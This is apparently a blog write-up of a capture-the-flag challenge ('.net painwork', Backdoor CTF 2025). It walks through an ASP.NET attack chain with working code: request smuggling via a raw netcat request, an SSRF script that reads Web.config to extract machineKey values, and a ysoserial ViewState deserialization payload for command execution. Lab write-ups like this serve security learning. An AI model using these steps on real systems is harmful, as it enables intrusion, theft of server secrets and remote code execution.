Skip to content

Dimas Maulana

C#

Created

Updated

2 min read

Reading time

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

C# Deserialization

Event NameBackdoor CTF 2025
GitHub URL-
Challenge Name.net painwork
Attachments
public-1.zip?rlkey=803zruuyl3swf4l1lzq6sgyio&st=1guk3hhy&dl=0
References
writeup

Step 1: Bypass the Reverse Proxy

First, we have to get past the reverse proxy by using the following script:

(printf "POST /login.aspx HTTP/1.1\\r\\n"\\
"Host: 4.188.81.42\\r\\n"\\
"Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:\\r\\n"\\
"Content-Length: 32\\r\\n\\r\\n"; sleep 1;\\
printf "GET /admin.aspx HTTP/1.1\\r\\n"\\
"DUMMY:"; sleep 1; printf "GET / HTTP/1.1\\r\\n"\\
"Host: 4.188.81.42\\r\\n\\r\\n") | nc 4.188.81.42 80

Step 2: Use Session ID and XSRF Token to Fetch Files

Get the SESSIONID and XSRF token and place them into the following script along with the URL you want to fetch.

import requests

HOST = "4.188.81.42"

SESSION_ID = ""
XSRF_TOKEN = ""
URL_VALUE = "file:///C:/inetpub/wwwroot/Web.config"

def main():
    url = f"http://{HOST}/health.ashx"

    headers = {
        "Host": HOST,
        "X-AntiXsrf": XSRF_TOKEN,
        "Accept-Language": "en-US,en;q=0.9",
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/142.0.0.0 Safari/537.36"
        ),
        "Content-Type": "application/json",
        "Accept": "*/*",
        "Origin": f"http://{HOST}",
        "Referer": f"http://{HOST}/admin.aspx",
    }

    cookies = {
        "ASP.NET_SessionId": SESSION_ID,
        "__AntiXsrfToken": XSRF_TOKEN,
    }

    data = {"url": URL_VALUE}

    print("[+] Sending POST /health.ashx ...")
    response = requests.post(url, headers=headers, cookies=cookies, json=data)
    print("[+] Status:", response.status_code)
    print("[+] Response body:")
    print(response.text)

if __name__ == "__main__":
    main()

Step 3: Generate a Payload with ysoserial

Extract the machineKey and use its values in the following ysoserial.exe command:

ysoserial.exe -p ViewState -g TypeConfuseDelegate \\
-c "dir C:\\inetpub\\wwwroot\\ > C:\\Windows\\Temp\\test.txt 2>&1" \\
--path="/login.aspx" \\
--apppath="/" \\
--decryptionalg="AES" \\
--decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" \\
--validationalg="SHA1" \\
--validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B"

Step 4: Inject the Payload

Intercept the POST request to /login.aspx and place the generated payload into the __VIEWSTATE parameter.

Step 5: Retrieve Command Output

Repeat Steps 1 and 2 to retrieve the contents of:

C:\\Windows\\Temp\\test.txt

Step 6: Retrieve the Flag

Identify the flag file name and repeat Steps 1 and 2 again to retrieve the contents of the flag file.

Share this note

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.